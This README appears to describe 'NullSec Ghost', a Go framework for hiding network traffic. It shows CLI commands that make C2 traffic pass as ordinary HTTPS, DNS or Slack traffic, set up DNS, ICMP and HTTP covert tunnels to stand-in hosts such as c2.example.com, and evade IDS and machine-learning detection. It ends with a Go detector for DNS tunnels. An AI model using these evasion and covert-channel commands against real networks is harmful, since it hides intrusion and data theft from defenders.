Advanced Network Stealth & Evasion Framework
Traffic Obfuscation • Protocol Mimicry • Covert Channels • Anti-Detection
NullSec Ghost is a comprehensive network stealth framework written in Go. It provides tools for traffic obfuscation, protocol mimicry, and covert channel establishment for authorized red team operations and security research.
| Feature | Description |
|---|---|
| Traffic Obfuscation | Scramble, pad, and encrypt network traffic |
| Protocol Mimicry | Make traffic appear as legitimate protocols |
| Covert Channels | DNS, ICMP, HTTP tunneling |
| Traffic Shaping | Normalize patterns to avoid ML detection |
| Anti-IDS | Evade signature-based detection |
| Multi-Hop | Chain proxies with protocol mixing |

```bash
# Obfuscate outbound traffic
ghost obfuscate --mode scramble --target 10.0.0.1:443
# Pad traffic to fixed sizes
ghost obfuscate --mode padding --size 1024
# XOR encrypt with rotating key
ghost obfuscate --mode xor --key random
```

```bash
# Mimic HTTPS traffic
ghost mimic --protocol https --target c2.example.com
# Mimic DNS queries
ghost mimic --protocol dns --target dns.example.com
# Mimic Slack/Teams webhooks
ghost mimic --protocol webhook --platform slack
```

```bash
# DNS tunneling
ghost covert dns --domain tunnel.example.com --mode bidirectional
# ICMP tunneling
ghost covert icmp --target 10.0.0.1 --payload-size 64
# HTTP covert channel
ghost covert http --url https://example.com/api --method cookies
```

```bash
# Normalize traffic timing
ghost shape --mode timing --interval 100ms --jitter 20ms
# Mimic browser patterns
ghost shape --profile chrome --sites google.com,github.com
# Anti-ML evasion
ghost shape --mode ml-evasion --model random-forest
```

```bash
# From source
go build -o ghost ./cmd/ghost
# Install
sudo mv ghost /usr/local/bin/
```

```yaml
# ghost.yaml
obfuscation:
  enabled: true
  mode: scramble
  padding: true
  pad_size: 1024
mimicry:
  protocol: https
  user_agent: "Mozilla/5.0..."
  tls_fingerprint: chrome
covert:
  channel: dns
  domain: tunnel.example.com
  encoding: base32
shaping:
  timing:
    interval: 100ms
    jitter: 20%
    burst_size: 5
  profile: browser
```

Observe and adapt to network patterns without generating suspicious traffic.

Actively obfuscate and disguise all outbound communications.

Dynamically switch protocols and patterns based on network environment.

```bash
# Chameleon mode - auto-adapt
ghost --mode chameleon --target c2.example.com
```

- Network detection system testing
- IDS/IPS evasion research
- Traffic analysis countermeasures
- Red team C2 infrastructure
- Covert communication research
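
For the detection-testing use case, the DNS covert channel in the sample configuration (`channel: dns`, `encoding: base32`) leaves a recognizable trace in resolver logs: many distinct, long, base32-alphabet subdomains under one parent domain. The Go program below is an added example, not code from NullSec Ghost; `looksBase32`, `SuspectParents`, the thresholds, and the sample query names are assumptions constructed for illustration.

```go
package main

import (
	"fmt"
	"strings"
)

var sampleQueries = []string{ // constructed sample names, not real traffic
	"nbswy3dpeb3w64tmmqqgc3tefzrw63i.tunnel.example.com",
	"NBSWY3DPEB3W64TMMQQGC3TEFZRW63I.tunnel.example.com.", // repeat, counted once
	"orugs4zanfzsaylomvsxg5dfon2ca4q.tunnel.example.com",
	"mjqxgzjtgiqgk3tdn5sgkzbamrqxiyi.tunnel.example.com",
	"k5swyy3pnvssa5dpebzxk4dqn5zhi2lo.cdn.example.net", // lone hash-like name
	"cdn-assets-eu.static.example.net", "www.example.org", "login.example.com",
}

// looksBase32: sub is lowercase, >= minLen chars, RFC 4648 base32 alphabet only.
func looksBase32(sub string, minLen int) bool {
	for _, r := range sub {
		if !(r >= 'a' && r <= 'z') && !(r >= '2' && r <= '7') {
			return false
		}
	}
	return len(sub) >= minLen
}

// SuspectParents groups names by their last two labels (an assumption; use the
// Public Suffix List in production) and flags parents with >= minUnique hits.
func SuspectParents(queries []string, minLen, minUnique int) map[string]int {
	seen := map[string]bool{}
	count, flagged := map[string]int{}, map[string]int{}
	for _, q := range queries {
		labels := strings.Split(strings.TrimSuffix(strings.ToLower(q), "."), ".")
		if len(labels) < 3 {
			continue
		}
		parent := strings.Join(labels[len(labels)-2:], ".")
		sub := strings.Join(labels[:len(labels)-2], "")
		if key := parent + "/" + sub; looksBase32(sub, minLen) && !seen[key] {
			seen[key] = true
			if count[parent]++; count[parent] >= minUnique {
				flagged[parent] = count[parent]
			}
		}
	}
	return flagged
}

func main() { fmt.Println(SuspectParents(sampleQueries, 24, 3)) }
```

The single hash-like name under `example.net` stays below the distinct-subdomain threshold, which is what separates CDN-style hostnames from a tunnel's steady stream of unique names.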
bad-antics • Part of NullSec Linux